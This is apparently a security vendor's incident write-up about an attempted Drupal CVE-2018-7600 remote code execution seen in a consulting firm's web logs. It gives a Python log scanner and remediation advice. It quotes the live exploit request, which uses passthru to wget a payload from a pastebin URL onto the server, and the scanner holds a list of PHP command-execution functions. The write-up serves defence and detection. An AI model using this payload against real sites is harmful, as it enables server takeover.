Remote Code Execution at Public Facing Website

The Network: A global management consulting firm with locations across the USA and UK.
 
The Expectation: EventTracker Co-Managed SIEM services, advanced endpoint protection, and behavior analytics would deliver added protection for company assets.
 
The Catch: Drupal CMS versions 7 and 8 are known to be vulnerable to a remote code execution attack; CVE-2018-7600 provides details. After the vulnerability was disclosed, the SIEMphonic Enterprise team monitored the web logs of external-facing web servers for evidence of such an attack.
 
The Find: A few weeks after the disclosure of the vulnerability, an exploitation attempt was observed in the web logs as the following request: /?q=user/password&name[#post_render][]=passthru&name[#type]=markup&name[#markup]=wget+https://pastebin.com/raw/tBqLLGbw+-O+spy0x.php HTTP/1.1. Note the use of the #post_render and name parameters, targeting the user/password request and invoking PHP's passthru function. The payload runs wget to retrieve a file from the pastebin.com URL and save it on the web server as spy0x.php (the -O option names the output file). The return code was 200, and the attacks were observed from a hosting provider in Amsterdam, NL.
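As an added illustration of the log monitoring described above (example code written for this write-up, not an EventTracker or SIEMphonic tool), the following Python scans web server access logs in the common combined format for the request pattern seen here: Drupal Form API property names (keys beginning with #) submitted inside query parameter names, and a PHP command-execution function supplied as a parameter value. The log lines are constructed for the example, with an invalid placeholder URL in place of the real payload host.

```python
import re
from urllib.parse import parse_qsl, unquote_plus

# Constructed sample access log (combined format); the first line mirrors the
# request shape from the case, with a placeholder payload URL.
SAMPLE_LOG = """\
203.0.113.10 - - [20/Apr/2018:10:15:01 +0000] "GET /?q=user/password&name[#post_render][]=passthru&name[#type]=markup&name[#markup]=wget+http://example.invalid/payload.txt+-O+spy0x.php HTTP/1.1" 200 512
198.51.100.7 - - [20/Apr/2018:10:15:02 +0000] "GET /?q=user/password&name=alice HTTP/1.1" 200 2048
198.51.100.8 - - [20/Apr/2018:10:15:03 +0000] "GET /node/1 HTTP/1.1" 200 4096
"""

# Combined log format: client ip, timestamp, request line, status, bytes.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+'
)
# Drupal Form API properties start with '#' and should never be client-supplied.
FORM_API_KEY = re.compile(r'\[#[A-Za-z_]+\]')
# PHP functions that run OS commands; one arriving as a submitted value is a red flag.
EXEC_FUNCS = {"passthru", "exec", "system", "shell_exec", "popen", "proc_open"}


def inspect_request(path):
    """Return the reasons a request path looks like CVE-2018-7600 abuse (empty if clean)."""
    reasons = []
    decoded = unquote_plus(path.partition("?")[2])  # %23 -> '#', '+' -> ' '
    keys = sorted(set(FORM_API_KEY.findall(decoded)))
    if keys:
        reasons.append("form-api-key:" + ",".join(keys))
    for _name, value in parse_qsl(decoded, keep_blank_values=True):
        if value.strip().lower() in EXEC_FUNCS:
            reasons.append("exec-func:" + value.strip())
    return reasons


def scan_log(text):
    """Yield (ip, status, path, reasons) for every suspicious request in the log text."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        reasons = inspect_request(m["path"])
        if reasons:
            hits.append((m["ip"], int(m["status"]), m["path"], reasons))
    return hits


if __name__ == "__main__":
    for ip, status, path, reasons in scan_log(SAMPLE_LOG):
        print(f"{ip} status={status} {' '.join(reasons)} :: {path}")
```

A status of 200 on a flagged request, as in this case, is the cue to treat the host as potentially compromised rather than merely probed.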
 
The Fix: The SIEMphonic Enterprise team made the following recommendations:
  1. Upgrade to the most recent version of Drupal 7 or 8 core.
  2. If you are running 7.x, upgrade to Drupal 7.58. (If you are unable to update immediately, you can apply this patch as a temporary fix until you are able to update completely.)
  3. If you are running 8.5.x, upgrade to Drupal 8.5.1. (If you are unable to update immediately, you can apply this patch as a temporary fix until you are able to update completely.)
  4. Block the attacking IP addresses at the proxy and firewall.
  5. Investigate further on the internal source systems and proxy devices.
  6. Install the latest version of your web server software, and ensure that all patches have been applied.
  7. Check browsers and systems for infection, and run anti-virus scans.
  8. Use a web vulnerability scanner and integrate it with EventTracker.
  9. Harden the proxy and firewall, and update them with the IOCs.

The Lesson: Vulnerabilities are a fact of life. They exist, are disclosed, and are patched by vendors. Keeping on top of these across all vendors is a thankless and endless, but critical, task. Absent this, breaches like the one at Equifax will occur. Eternal vigilance is critical.